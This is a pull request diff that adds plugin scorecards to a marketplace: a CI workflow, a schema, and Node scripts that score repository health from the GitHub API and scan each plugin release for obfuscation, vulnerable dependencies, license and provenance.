### PR TITLE
Add plugin scorecards: repository health and automated release review

### DIFF
--- a/.github/workflows/scorecard.yml
+++ b/.github/workflows/scorecard.yml
@@ -1,0 +1,82 @@
+name: Scorecards
+on:
+  workflow_dispatch:
+  pull_request:
+    paths: ["entries/**"]
+  schedule:
+    # Weekly. Health signals move slowly, and the review scan is what catches
+    # a bad release, so a compromised update is found within days of shipping
+    # even when nobody opens a pull request.
+    - cron: "41 4 * * 1"
+jobs:
+  # A pull request scans only the entries it touches and fails on a review
+  # failure, so a submission that ships obfuscated code cannot be merged
+  # while the check is red.
+  changed:
+    if: github.event_name == 'pull_request'
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v4
+        with: { fetch-depth: 0 }
+      - uses: actions/setup-node@v4
+        with: { node-version: 20 }
+      - run: npm ci
+      - name: Scan changed entries
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          npm run scorecards -- --changed --fail-on-review --print \
+            | tee scorecards.json > /dev/null
+      - name: Summarize
+        if: always()
+        run: |
+          if [[ ! -s scorecards.json ]]; then
+            echo "No entry changed, or the scan produced nothing." >> "$GITHUB_STEP_SUMMARY"
+            exit 0
+          fi
+          node -e '
+            const document = require("./scorecards.json");
+            const lines = ["| Plugin | Health | Review | Findings |", "| --- | --- | --- | --- |"];
+            for (const [id, card] of Object.entries(document.plugins)) {
+              const findings = card.review.findings
+                .filter((finding) => finding.severity !== "pass")
+                .map((finding) => `${finding.severity}: ${finding.message}`)
+                .join("<br>") || "none";
+              lines.push(`| ${id} | ${card.health?.grade ?? "unrated"} | ${card.review.verdict} | ${findings} |`);
+            }
+            require("node:fs").appendFileSync(process.env.GITHUB_STEP_SUMMARY, lines.join("\n") + "\n");
+          '
+
+  # The published document. A failing review is reported, not suppressed: the
+  # store shows the verdict, and hiding a bad scorecard would be the one
+  # outcome worse than showing it.
+  publish:
+    if: github.event_name != 'pull_request'
+    runs-on: ubuntu-latest
+    environment: production
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with: { node-version: 20 }
+      - run: npm ci
+      - name: Install Wrangler 4.86.0
+        run: npm install --global wrangler@4.86.0
+      # Fails, and uploads nothing, when no scorecard could be built: the last
+      # published document keeps serving rather than being blanked.
+      - name: Build scorecards.json
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: npm run scorecards
+      - name: Upload scorecards.json
+        env:
+          CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
+          CLOUDFLARE_ACCOUNT_ID: ${{ vars.CLOUDFLARE_ACCOUNT_ID }}
+        run: |
+          source scripts/r2-upload.sh
+          r2_put_with_retry "bb-marketplace/v2/scorecards.json" \
+            --file dist/v2/scorecards.json \
+            --content-type application/json --remote

--- a/README.md
+++ b/README.md
@@ -22,6 +22,9 @@ One entry file supplies data to both documents.
 - `scripts/build.mjs` validates the source and builds both documents.
 - `scripts/check-v1-gate.mjs` compares the v1 entries with the live document.
 - `scripts/build-stats.mjs` builds the install-count document.
+- `scripts/build-scorecards.mjs` builds the scorecard document.
+- `scripts/scorecard-lib.mjs` holds the scoring and scanning rules.
+- `schema/scorecards.schema.json` defines the scorecard document.
 
 The build writes `dist/marketplace.json` and `dist/v2/marketplace.json`.
 The base file carries the v1 identity and keeps `schemaVersion` set to `1`.
@@ -129,6 +132,36 @@ CI compares each generated v1 entry with the live v1 entry.
 A new entry passes this gate.
 A changed or removed entry needs the `v1-change` pull request label.
 A push to `main` only reports a warning after such a change.
+
+## Scorecards
+
+[The scorecard document](https://getbb.app/marketplace/v2/scorecards.json) reports two scores per plugin.
+The store renders them beside an entry.
+
+`health` scores the repository around the plugin from the GitHub API.
+It has four sections: hygiene, maintenance, responsiveness, and adoption.
+Maintenance caps the overall grade, so a documented but dormant plugin cannot grade well.
+
+`review` scores automated scans of the release the entry resolves to.
+The scans cover obfuscated code, committed minified code, network patterns, vulnerable production dependencies, the license, and release provenance.
+The review also lists the capabilities the release code reaches for, such as shell execution, filesystem access, or secrets access.
+BB has no declared plugin permission manifest, so a capability is observed in the code, not promised by the author.
+
+Two signals fail a review: obfuscator-generated identifiers, and a file that both decodes a payload and evaluates a non-literal value.
+Everything else flags.
+A failing review is not a takedown; it is a merge blocker on the pull request and a visible verdict in the store.
+
+The pull request job scans only the entries the pull request changes.
+The scheduled job scans every entry weekly, so a compromised update is caught after a semver range picks it up, not only at first submission.
+A plugin missing from the document has no scorecard yet, which is not a pass.
+
+The document stays separate from the manifest for the same reasons `stats.json` does: the v1 schema is strict, and these scores move on their own cadence.
+
+Run the scan locally with a token that has public repository read access:
+
+```sh
+GITHUB_TOKEN=... npm run scorecards -- --entry example-plugin --print
+```
 
 ## Install counts
 

--- a/package.json
+++ b/package.json
@@ -8,6 +8,7 @@
   "scripts": {
     "build": "node scripts/build.mjs",
     "build:stats": "node scripts/build-stats.mjs",
+    "scorecards": "node scripts/build-scorecards.mjs",
     "check": "node scripts/build.mjs --liveness",
     "gate:v1": "node scripts/check-v1-gate.mjs",
     "test": "node --test && bash test/r2-upload-retry.test.sh"

--- a/schema/scorecards.schema.json
+++ b/schema/scorecards.schema.json
@@ -1,0 +1,111 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://getbb.app/schemas/scorecards.schema.json",
+  "title": "BB marketplace plugin scorecards",
+  "description": "The scorecard sidecar published beside marketplace.json. Health scores the repository around a plugin; review scores automated scans of the release the entry resolves to. A plugin absent from this document has no scorecard yet, which is not a pass.",
+  "type": "object",
+  "required": ["schemaVersion", "generatedAt", "plugins"],
+  "additionalProperties": false,
+  "properties": {
+    "schemaVersion": { "const": 1 },
+    "generatedAt": { "type": "string", "format": "date-time" },
+    "plugins": {
+      "type": "object",
+      "propertyNames": { "pattern": "^[a-z0-9][a-z0-9-]*$" },
+      "additionalProperties": { "$ref": "#/$defs/scorecard" }
+    }
+  },
+  "$defs": {
+    "grade": { "enum": ["failing", "poor", "fair", "good", "excellent"] },
+    "severity": { "enum": ["pass", "info", "warn", "fail"] },
+    "scorecard": {
+      "type": "object",
+      "required": ["review"],
+      "additionalProperties": false,
+      "properties": {
+        "repository": { "type": "string" },
+        "license": { "type": ["string", "null"] },
+        "health": {
+          "type": ["object", "null"],
+          "description": "Null when the entry has no repository to read, such as an npm-only source.",
+          "required": ["grade", "bars", "summary", "sections"],
+          "additionalProperties": false,
+          "properties": {
+            "grade": { "$ref": "#/$defs/grade" },
+            "bars": { "type": "integer", "minimum": 0, "maximum": 4 },
+            "summary": { "type": "string" },
+            "sections": {
+              "type": "array",
+              "items": {
+                "type": "object",
+                "required": ["id", "label", "points", "grade", "detail"],
+                "additionalProperties": false,
+                "properties": {
+                  "id": { "enum": ["hygiene", "maintenance", "responsiveness", "adoption"] },
+                  "label": { "type": "string" },
+                  "points": { "type": "number", "minimum": 0, "maximum": 1 },
+                  "grade": { "$ref": "#/$defs/grade" },
+                  "detail": { "type": "string" }
+                }
+              }
+            }
+          }
+        },
+        "review": {
+          "type": "object",
+          "required": ["verdict", "bars", "summary", "findings"],
+          "additionalProperties": false,
+          "properties": {
+            "verdict": { "enum": ["failed", "flagged", "passed", "pending"] },
+            "bars": { "type": "integer", "minimum": 0, "maximum": 4 },
+            "summary": { "type": "string" },
+            "release": { "type": "string" },
+            "scannedFiles": { "type": "integer", "minimum": 0 },
+            "error": {
+              "type": "string",
+              "description": "Why the scan could not run. Present only with the pending verdict."
+            },
+            "findings": {
+              "type": "array",
+              "items": {
+                "type": "object",
+                "required": ["severity", "check", "message"],
+                "additionalProperties": false,
+                "properties": {
+                  "severity": { "$ref": "#/$defs/severity" },
+                  "check": {
+                    "enum": [
+                      "obfuscation",
+                      "generated",
+                      "network",
+                      "dependencies",
+                      "license",
+                      "provenance"
+                    ]
+                  },
+                  "message": { "type": "string" }
+                }
+              }
+            },
+            "capabilities": {
+              "type": "array",
+              "description": "What the release code reaches for, derived from its call surface. BB has no declared plugin permission manifest, so these are observed, not promised.",
+              "items": {
+                "type": "object",
+                "required": ["id", "label", "severity", "description", "evidence"],
+                "additionalProperties": false,
+                "properties": {
+                  "id": { "type": "string" },
+                  "label": { "type": "string" },
+                  "severity": { "$ref": "#/$defs/severity" },
+                  "description": { "type": "string" },
+                  "evidence": { "type": "array", "items": { "type": "string" }, "maxItems": 5 }
+                }
+              }
+            }
+          }
+        }
+      }
+    }
+  }
+}

--- a/scripts/build-scorecards.mjs
+++ b/scripts/build-scorecards.mjs
@@ -1,0 +1,653 @@
+#!/usr/bin/env node
+// Compose dist/v2/scorecards.json: the plugin scorecard sidecar the store
+// renders beside a marketplace entry.
+//
+// Two scores per plugin, from two sources:
+//
+//   health  repository signals read from the GitHub API — hygiene,
+//           maintenance, responsiveness, adoption.
+//   review  automated scans of the release the entry actually resolves to —
+//           obfuscation, network patterns, dependency vulnerabilities,
+//           license, provenance, plus the capabilities the code reaches for.
+//
+// Every published version is scanned, not just the first submission: an entry
+// tracking a semver range picks up new tags without a marketplace pull
+// request, so a first-submission-only check would scan code nobody installs.
+//
+// The document is a sidecar for the same reasons stats.json is one — the
+// marketplace schemas are strict, and these numbers move on their own cadence.
+//
+// Environment:
+//   GITHUB_TOKEN  a token with public repository read access; without it the
+//                 GitHub API allows 60 requests an hour and the run fails.
+//   GENERATED_AT  ISO timestamp to stamp; defaults to now.
+//
+// Options:
+//   --entry <id>       scan one entry; repeatable
+//   --changed          scan only entries changed by the pull request
+//   --concurrency <n>  plugins scanned in parallel (default 4)
+//   --print            write the document to stdout instead of dist/
+//   --fail-on-review   exit non-zero when a scanned entry fails its review
+import { execFileSync } from "node:child_process";
+import {
+  existsSync,
+  mkdirSync,
+  mkdtempSync,
+  readFileSync,
+  readdirSync,
+  rmSync,
+  statSync,
+  writeFileSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
+import { join, relative } from "node:path";
+import { fileURLToPath } from "node:url";
+import {
+  dependencyFinding,
+  licenseFinding,
+  provenanceFinding,
+  scanRelease,
+  scoreHealth,
+  scoreReview,
+  scorecardDocument,
+} from "./scorecard-lib.mjs";
+import { pullRequestEntryFiles } from "./marketplace-lib.mjs";
+
+const root = fileURLToPath(new URL("..", import.meta.url));
+const args = process.argv.slice(2);
+const printOnly = args.includes("--print");
+const changedOnly = args.includes("--changed");
+const failOnReview = args.includes("--fail-on-review");
+const concurrency = Number(readOption("--concurrency") ?? 4);
+const requestedIds = args.flatMap((value, index) =>
+  value === "--entry" ? [args[index + 1]] : [],
+);
+
+/** Source files worth scanning. Anything else is noise or not text. */
+const SOURCE_EXTENSIONS = new Set([".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs", ".json"]);
+const SKIPPED_DIRECTORIES = new Set([
+  ".git",
+  "test",
+  "tests",
+  "__tests__",
+  "e2e",
+  "node_modules",
+  "dist",
+  "build",
+  "out",
+  "coverage",
+  ".next",
+  "vendor",
+]);
+const TEST_FILE_PATTERN = /\.(?:test|spec)\.[cm]?[jt]sx?$/;
+/** One pathological file must not turn a scan into a memory incident. */
+const MAX_FILE_BYTES = 2 * 1024 * 1024;
+const MAX_SCANNED_FILES = 2000;
+
+function readOption(name) {
+  const index = args.indexOf(name);
+  return index === -1 ? undefined : args[index + 1];
+}
+
+function readJson(path) {
+  return JSON.parse(readFileSync(path, "utf8"));
+}
+
+function entryIds() {
+  const all = readdirSync(join(root, "entries"))
+    .filter((name) => name.endsWith(".json"))
+    .map((name) => name.replace(/\.json$/, ""))
+    .sort();
+  if (requestedIds.length > 0) {
+    const known = new Set(all);
+    for (const id of requestedIds) {
+      if (!known.has(id)) {
+        console.error(`error: no entry file for "${id}"`);
+        process.exit(1);
+      }
+    }
+    return requestedIds;
+  }
+  if (!changedOnly) return all;
+
+  const eventPath = process.env.GITHUB_EVENT_PATH;
+  if (eventPath === undefined) {
+    console.error("error: --changed needs GITHUB_EVENT_PATH");
+    process.exit(1);
+  }
+  return pullRequestEntryFiles(root, readJson(eventPath))
+    .map((file) => file.replace(/^entries\//, "").replace(/\.json$/, ""))
+    .filter((id) => all.includes(id));
+}
+
+// ---------------------------------------------------------------------------
+// GitHub
+// ---------------------------------------------------------------------------
+
+const githubToken = process.env.GITHUB_TOKEN?.trim();
+
+async function github(path, { accept = "application/vnd.github+json" } = {}) {
+  const response = await fetch(`https://api.github.com${path}`, {
+    headers: {
+      accept,
+      "user-agent": "bb-marketplace-scorecards",
+      ...(githubToken ? { authorization: `Bearer ${githubToken}` } : {}),
+    },
+    signal: AbortSignal.timeout(30_000),
+  });
+  if (response.status === 404) return null;
+  if (response.status === 202) return { retryLater: true }; // statistics are being computed
+  if (response.status === 403 || response.status === 429) {
+    throw new Error(`GitHub rate limit reached on ${path}`);
+  }
+  if (!response.ok) throw new Error(`GitHub ${response.status} on ${path}`);
+  if (response.status === 204) return null;
+  return response.json();
+}
+
+/**
+ * GitHub allows 30 search requests a minute against a far higher REST budget,
+ * and a scan of every entry makes two search calls each. One shared queue
+ * paces them so a wide run does not lose its issue counts to a 403.
+ */
+let searchChain = Promise.resolve();
+function throttledSearch(path) {
+  const result = searchChain.then(async () => {
+    const answer = await githubWithRetry(path, 3, { rateLimitIsRetryable: true });
+    await new Promise((resolve) => setTimeout(resolve, 2100));
+    return answer;
+  });
+  searchChain = result.then(
+    () => undefined,
+    () => undefined,
+  );
+  return result;
+}
+
+async function githubWithRetry(path, attempts = 4, { rateLimitIsRetryable = false } = {}) {
+  for (let attempt = 0; attempt < attempts; attempt += 1) {
+    try {
+      const result = await github(path);
+      if (result?.retryLater !== true) return result;
+    } catch (error) {
+      const isRateLimit = error instanceof Error && error.message.includes("rate limit");
+      if (!isRateLimit || !rateLimitIsRetryable || attempt === attempts - 1) throw error;
+      // The window is a minute wide; waiting it out beats losing the signal.
+      await new Promise((resolve) => setTimeout(resolve, 20_000));
+      continue;
+    }
+    await new Promise((resolve) => setTimeout(resolve, 2000 * (attempt + 1)));
+  }
+  return null;
+}
+
+/** github.com/<owner>/<repo>[.git] — the only Git host entries use today. */
+function parseGitHubRepo(url) {
+  const match = /^https:\/\/github\.com\/([^/]+)\/([^/]+?)(?:\.git)?\/?$/.exec(url ?? "");
+  return match === null ? null : { owner: match[1], repo: match[2] };
+}
+
+async function repositorySignals(owner, repo, installs) {
+  const [repository, community, participation, latestRelease, contributors] = await Promise.all([
+    github(`/repos/${owner}/${repo}`),
+    github(`/repos/${owner}/${repo}/community/profile`),
+    // GitHub computes commit statistics on demand and answers 202 while it
+    // works. Taking that as zero would score an active repository as dormant.
+    githubWithRetry(`/repos/${owner}/${repo}/stats/participation`),
+    github(`/repos/${owner}/${repo}/releases/latest`),
+    github(`/repos/${owner}/${repo}/contributors?per_page=100`),
+  ]);
+  if (repository === null) throw new Error(`repository ${owner}/${repo} is not reachable`);
+
+  const files = community?.files ?? {};
+  const openIssues = await issueCount(owner, repo, "open");
+  const closedIssues = await issueCount(owner, repo, "closed");
+
+  return {
+    hasReadme: files.readme !== null && files.readme !== undefined,
+    hasLicense: files.license !== null && files.license !== undefined,
+    hasContributing: files.contributing !== null && files.contributing !== undefined,
+    hasDescription: typeof repository.description === "string" && repository.description.length > 0,
+    lastCommitAt: repository.pushed_at ?? null,
+    lastReleaseAt:
+      latestRelease?.published_at ?? (await newestTagDate(owner, repo)),
+    commitsPastYear: (participation?.all ?? []).reduce((total, week) => total + week, 0),
+    contributors: Array.isArray(contributors) ? contributors.length : 0,
+    openIssues,
+    closedIssues,
+    installs,
+    stars: repository.stargazers_count ?? 0,
+    license: repository.license?.spdx_id === "NOASSERTION" ? null : repository.license?.spdx_id ?? null,
+  };
+}
+
+/**
+ * A repository can tag releases without ever creating a GitHub Release, and
+ * BB installs from tags. Fall back to the newest tag's commit date so those
+ * repositories are not scored as if they never shipped.
+ */
+async function newestTagDate(owner, repo) {
+  const tags = await github(`/repos/${owner}/${repo}/tags?per_page=1`);
+  const sha = Array.isArray(tags) ? tags[0]?.commit?.sha : undefined;
+  if (sha === undefined) return null;
+  const commit = await github(`/repos/${owner}/${repo}/commits/${sha}`);
+  return commit?.commit?.committer?.date ?? null;
+}
+
+/**
+ * Issue counts come from search because /repos gives open only, and counts
+ * pull requests in with them. `is:issue` keeps pull requests out of a number
+ * the store presents as issue responsiveness.
+ */
+async function issueCount(owner, repo, state) {
+  const query = encodeURIComponent(`repo:${owner}/${repo} is:issue is:${state}`);
+  const result = await throttledSearch(`/search/issues?q=${query}&per_page=1`);
+  return result?.total_count ?? 0;
+}
+
+// ---------------------------------------------------------------------------
+// Release sources
+// ---------------------------------------------------------------------------
+
+/**
+ * Resolve the entry's source to the exact release a user installs today, and
+ * unpack it. A range source resolves to its highest matching tag, which is
+ * what BB itself installs.
+ */
+function resolveGitRelease({ url, ref, range, tagPrefix }) {
+  if (range === undefined) return { ref, label: ref, isTag: false };
+  const prefix = tagPrefix ?? "";
+  const output = execFileSync("git", ["ls-remote", "--tags", url, `refs/tags/${prefix}v*`], {
+    encoding: "utf8",
+    timeout: 60_000,
+  });
+  const pattern = new RegExp(
+    `refs/tags/${prefix.replaceAll(/[.*+?^${}()|[\]\\]/g, "\\$&")}(v\\d+\\.\\d+\\.\\d+)$`,
+  );
+  const versions = output
+    .split("\n")
+    .map((line) => pattern.exec(line.trim())?.[1])
+    .filter((value) => value !== undefined)
+    .sort(compareVersions);
+  const highest = versions.at(-1);
+  if (highest === undefined) throw new Error(`no ${prefix}vX.Y.Z tag matches "${range}"`);
+  return { ref: `${prefix}${highest}`, label: highest, isTag: true };
+}
+
+function compareVersions(left, right) {
+  const parse = (value) => value.replace(/^v/, "").split(".").map(Number);
+  const [a, b] = [parse(left), parse(right)];
+  for (let index = 0; index < 3; index += 1) {
+    if (a[index] !== b[index]) return a[index] - b[index];
+  }
+  return 0;
+}
+
+function downloadArchive(url, directory) {
+  // curl and tar, rather than a dependency: the repository has no runtime
+  // dependencies and this file should not add one.
+  const archive = join(directory, "release.tar.gz");
+  execFileSync("curl", ["-sSL", "--max-time", "120", "-o", archive, url], { timeout: 180_000 });
+  const extracted = join(directory, "source");
+  mkdirSync(extracted, { recursive: true });
+  execFileSync("tar", ["-xzf", archive, "-C", extracted, "--strip-components", "1"], {
+    timeout: 180_000,
+  });
+  return extracted;
+}
+
+function collectSourceFiles(directory) {
+  const files = [];
+  const walk = (current) => {
+    if (files.length >= MAX_SCANNED_FILES) return;
+    for (const item of readdirSync(current, { withFileTypes: true })) {
+      if (files.length >= MAX_SCANNED_FILES) return;
+      if (item.isSymbolicLink()) continue;
+      const path = join(current, item.name);
+      if (item.isDirectory()) {
+        if (!SKIPPED_DIRECTORIES.has(item.name)) walk(path);
+        continue;
+      }
+      if (!item.isFile()) continue;
+      const extension = item.name.slice(item.name.lastIndexOf("."));
+      if (!SOURCE_EXTENSIONS.has(extension)) continue;
+      // A test file is not installed, so what it reaches for is not a
+      // capability of the plugin.
+      if (TEST_FILE_PATTERN.test(item.name)) continue;
+      if (statSync(path).size > MAX_FILE_BYTES) continue;
+      files.push({ path: relative(directory, path), text: readFileSync(path, "utf8") });
+    }
+  };
+  walk(directory);
+  return files;
+}
+
+// ---------------------------------------------------------------------------
+// Dependencies
+// ---------------------------------------------------------------------------
+
+/**
+ * The production closure, at the exact versions the lockfile pins.
+ *
+ * Walking from the root's runtime dependencies matters more than it looks:
+ * a `dev: true` flag is not on every lockfile entry, and counting a test
+ * runner's advisory against a plugin that never ships it is the fastest way
+ * to make every scorecard noise.
+ */
+function lockedDependencies(directory) {
+  let lock;
+  try {
+    lock = readJson(join(directory, "package-lock.json"));
+  } catch {
+    return null;
+  }
+  const packages = lock.packages ?? {};
+  const root = packages[""];
+  if (root === undefined) return null;
+
+  /** Node resolution: nearest node_modules wins, walking up from the importer. */
+  const resolve = (importerPath, name) => {
+    let prefix = importerPath;
+    for (;;) {
+      const candidate = prefix === "" ? `node_modules/${name}` : `${prefix}/node_modules/${name}`;
+      if (packages[candidate] !== undefined) return candidate;
+      const cut = prefix.lastIndexOf("/node_modules/");
+      if (cut === -1) return undefined;
+      prefix = prefix.slice(0, cut);
+    }
+  };
+
+  const found = new Map();
+  const queue = [["", { ...root.dependencies, ...root.optionalDependencies }]];
+  const visited = new Set([""]);
+  while (queue.length > 0) {
+    const [importerPath, dependencies] = queue.shift();
+    for (const name of Object.keys(dependencies ?? {})) {
+      const path = resolve(importerPath, name);
+      if (path === undefined || visited.has(path)) continue;
+      visited.add(path);
+      const entry = packages[path];
+      if (typeof entry?.version !== "string") continue;
+      found.set(`${name}@${entry.version}`, { name, version: entry.version });
+      queue.push([path, { ...entry.dependencies, ...entry.optionalDependencies }]);
+    }
+  }
+  return [...found.values()];
+}
+
+/** OSV.dev takes a batch query and needs no key. */
+async function queryVulnerabilities(dependencies) {
+  if (dependencies === null) return null;
+  if (dependencies.length === 0) return [];
+  const found = [];
+  for (let index = 0; index < dependencies.length; index += 500) {
+    const batch = dependencies.slice(index, index + 500);
+    const response = await fetch("https://api.osv.dev/v1/querybatch", {
+      method: "POST",
+      headers: { "content-type": "application/json" },
+      body: JSON.stringify({
+        queries: batch.map(({ name, version }) => ({
+          package: { name, ecosystem: "npm" },
+          version,
+        })),
+      }),
+      signal: AbortSignal.timeout(60_000),
+    });
+    if (!response.ok) throw new Error(`OSV query failed with HTTP ${response.status}`);
+    const body = await response.json();
+    (body.results ?? []).forEach((result, position) => {
+      for (const vulnerability of result.vulns ?? []) {
+        const dependency = batch[position];
+        found.push({
+          package: dependency.name,
+          version: dependency.version,
+          id: vulnerability.id,
+          critical: isCritical(vulnerability),
+        });
+      }
+    });
+  }
+  return found;
+}
+
+function isCritical(vulnerability) {
+  const severities = [
+    ...(vulnerability.severity ?? []).map((item) => item.score ?? ""),
+    vulnerability.database_specific?.severity ?? "",
+  ];
+  return severities.some((value) => /CRITICAL/i.test(value) || /\/AV:N\/.*\/C:H\/I:H\/A:H/.test(value));
+}
+
+const npmManifests = new Map();
+
+async function npmManifest(packageName, version) {
+  const key = `${packageName}@${version ?? "latest"}`;
+  if (!npmManifests.has(key)) {
+    npmManifests.set(
+      key,
+      fetch(`https://registry.npmjs.org/${packageName.replace("/", "%2F")}/${version ?? "latest"}`, {
+        headers: { accept: "application/json" },
+        signal: AbortSignal.timeout(30_000),
+      })
+        .then((response) => (response.ok ? response.json() : null))
+        .catch(() => null),
+    );
+  }
+  return npmManifests.get(key);
+}
+
+/** package.json `repository` takes several shapes; only a GitHub URL is useful here. */
+function normalizeRepositoryUrl(repository) {
+  const raw = typeof repository === "string" ? repository : repository?.url;
+  if (typeof raw !== "string") return undefined;
+  return raw
+    .replace(/^git\+/, "")
+    .replace(/^git:\/\//, "https://")
+    .replace(/^github:/, "https://github.com/")
+    .replace(/^git@github\.com:/, "https://github.com/");
+}
+
+async function npmProvenance(packageName, version) {
+  const manifest = await npmManifest(packageName, version);
+  return manifest?.dist?.attestations !== undefined;
+}
+
+// ---------------------------------------------------------------------------
+// One plugin
+// ---------------------------------------------------------------------------
+
+async function buildScorecard(id, installCounts) {
+  const entry = readJson(join(root, "entries", `${id}.json`));
+  // An npm entry names no repository, but its published manifest usually
+  // does, and health without it would leave most npm plugins unrated.
+  const repository =
+    parseGitHubRepo(entry.source?.git?.url) ??
+    (entry.source?.npm === undefined
+      ? null
+      : parseGitHubRepo(
+          normalizeRepositoryUrl(
+            (await npmManifest(entry.source.npm.package, entry.source.npm.version))?.repository,
+          ),
+        ));
+  const scorecard = { id };
+
+  // An entry without a readable repository still gets a review; health stays
+  // null rather than being guessed, and a GitHub failure degrades the same way
+  // instead of costing the plugin its whole scorecard.
+  scorecard.health = null;
+  if (repository !== null) {
+    scorecard.repository = `${repository.owner}/${repository.repo}`;
+    try {
+      const signals = await repositorySignals(repository.owner, repository.repo, installCounts[id] ?? 0);
+      scorecard.health = scoreHealth(signals);
+      scorecard.license = signals.license;
+    } catch (error) {
+      console.error(`warning: ${id}: health unavailable. ${error instanceof Error ? error.message : error}`);
+    }
+  }
+
+  const workspace = mkdtempSync(join(tmpdir(), `scorecard-${id}-`));
+  try {
+    let sourceDirectory;
+    let releaseLabel;
+    if (entry.source?.git !== undefined && repository !== null) {
+      const release = resolveGitRelease(entry.source.git);
+      releaseLabel = release.label;
+      sourceDirectory = downloadArchive(
+        // refs/tags/ explicitly: a tag prefixed with a plugin name contains a
+        // slash, which the shorthand form resolves as a branch path.
+        `https://codeload.github.com/${repository.owner}/${repository.repo}/tar.gz/${
+          release.isTag ? `refs/tags/${release.ref}` : release.ref
+        }`,
+        workspace,
+      );
+      // A monorepo entry names the one directory BB installs from. Scanning
+      // the whole repository would score a plugin on its siblings' code.
+      const subdirectory = entry.source.git.subdir;
+      if (subdirectory !== undefined) {
+        const scoped = join(sourceDirectory, subdirectory);
+        if (!existsSync(scoped)) throw new Error(`subdir "${subdirectory}" is missing from the release`);
+        sourceDirectory = scoped;
+      }
+    } else if (entry.source?.npm !== undefined) {
+      const { package: packageName, version } = entry.source.npm;
+      const metadata = await npmManifest(packageName, version);
+      if (metadata?.dist?.tarball === undefined) throw new Error("npm package has no tarball");
+      releaseLabel = metadata.version;
+      sourceDirectory = downloadArchive(metadata.dist.tarball, workspace);
+    } else {
+      throw new Error("entry has no git or npm source");
+    }
+
+    let manifest = {};
+    try {
+      manifest = readJson(join(sourceDirectory, "package.json"));
+    } catch {
+      // A release without a package.json is odd but not a scan failure; the
+      // capability probes still read the sources.
+    }
+
+    const files = collectSourceFiles(sourceDirectory);
+    const scan = scanRelease(files, manifest);
+    const vulnerabilities = await queryVulnerabilities(lockedDependencies(sourceDirectory));
+    const attested =
+      entry.source?.npm === undefined
+        ? false
+        : await npmProvenance(entry.source.npm.package, entry.source.npm.version);
+
+    const findings = [
+      ...scan.findings,
+      dependencyFinding(vulnerabilities),
+      licenseFinding(manifest.license ?? scorecard.license),
+      provenanceFinding(entry.source, attested),
+    ];
+    scorecard.review = {
+      ...scoreReview(findings),
+      release: releaseLabel,
+      scannedFiles: files.length,
+      capabilities: scan.capabilities,
+    };
+  } catch (error) {
+    scorecard.review = {
+      ...scoreReview([]),
+      error: error instanceof Error ? error.message : String(error),
+    };
+  } finally {
+    rmSync(workspace, { recursive: true, force: true });
+  }
+
+  return scorecard;
+}
+
+/** Fixed-size worker pool: 153 entries at once would trip every rate limit. */
+async function mapWithConcurrency(items, limit, worker) {
+  const results = new Array(items.length);
+  let next = 0;
+  const runners = Array.from({ length: Math.max(1, Math.min(limit, items.length)) }, async () => {
+    while (next < items.length) {
+      const index = next;
+      next += 1;
+      results[index] = await worker(items[index], index);
+    }
+  });
+  await Promise.all(runners);
+  return results;
+}
+
+// ---------------------------------------------------------------------------
+// Run
+// ---------------------------------------------------------------------------
+
+if (!githubToken) {
+  console.error("error: GITHUB_TOKEN is not set; the unauthenticated API allows 60 requests an hour");
+  process.exit(1);
+}
+
+let installCounts = {};
+try {
+  const response = await fetch("https://getbb.app/marketplace/v1/stats.json", {
+    signal: AbortSignal.timeout(30_000),
+  });
+  if (response.ok) {
+    const body = await response.json();
+    installCounts = Object.fromEntries(
+      Object.entries(body.plugins ?? {}).map(([id, value]) => [id, value.installs ?? 0]),
+    );
+  }
+} catch {
+  // Adoption falls back to stars alone; a missing sidecar must not fail a scan.
+  console.error("warning: install counts are unavailable; adoption uses stars only");
+}
+
+const ids = entryIds();
+const scorecards = {};
+const failures = [];
+const results = await mapWithConcurrency(ids, concurrency, async (id) => {
+  try {
+    return await buildScorecard(id, installCounts);
+  } catch (error) {
+    failures.push(`${id}: ${error instanceof Error ? error.message : error}`);
+    return null;
+  }
+});
+for (const scorecard of results) {
+  if (scorecard === null) continue;
+  const { id, ...rest } = scorecard;
+  scorecards[id] = rest;
+}
+
+for (const failure of failures) console.error(`warning: ${failure}`);
+
+if (Object.keys(scorecards).length === 0) {
+  // Publishing an empty document would blank every scorecard in the store.
+  console.error("error: no scorecard could be built");
+  process.exit(1);
+}
+
+const document = scorecardDocument(scorecards, process.env.GENERATED_AT);
+const bytes = `${JSON.stringify(document, null, 2)}\n`;
+
+if (printOnly) {
+  process.stdout.write(bytes);
+} else {
+  mkdirSync(join(root, "dist", "v2"), { recursive: true });
+  writeFileSync(join(root, "dist", "v2", "scorecards.json"), bytes);
+  console.log(`built dist/v2/scorecards.json with ${Object.keys(scorecards).length} scorecards`);
+}
+
+// The per-plugin log goes to stderr: with --print, stdout is the document
+// and a caller pipes it straight into a file.
+for (const [id, scorecard] of Object.entries(scorecards)) {
+  const health = scorecard.health?.grade ?? "unrated";
+  console.error(`${id}: health ${health}, review ${scorecard.review.verdict}`);
+}
+
+if (failOnReview) {
+  const failed = Object.entries(scorecards).filter(([, value]) => value.review.verdict === "failed");
+  for (const [id, value] of failed) {
+    for (const item of value.review.findings.filter((finding) => finding.severity === "fail")) {
+      console.error(`error: ${id}: ${item.message}`);
+    }
+  }
+  if (failed.length > 0) process.exit(1);
+}

--- a/scripts/scorecard-lib.mjs
+++ b/scripts/scorecard-lib.mjs
@@ -1,0 +1,521 @@
+// Pure scorecard logic: repository health scoring, release code scanning, and
+// document assembly. Everything here is a function of its arguments so the
+// unit tests can cover the scoring rules without a network.
+//
+// Two independent scores, kept separate on purpose:
+//
+//   health  what the repository around the plugin looks like — is anyone home.
+//   review  what the published release code does — automated scans only.
+//
+// A plugin can be actively maintained and still ship something the review
+// flags, and a dormant repository can hold blameless code. Averaging the two
+// into one number would hide both cases.
+
+/** Grades run worst to best; the store renders one filled bar per level. */
+export const GRADES = Object.freeze(["failing", "poor", "fair", "good", "excellent"]);
+export const GRADE_BARS = Object.freeze({
+  failing: 1,
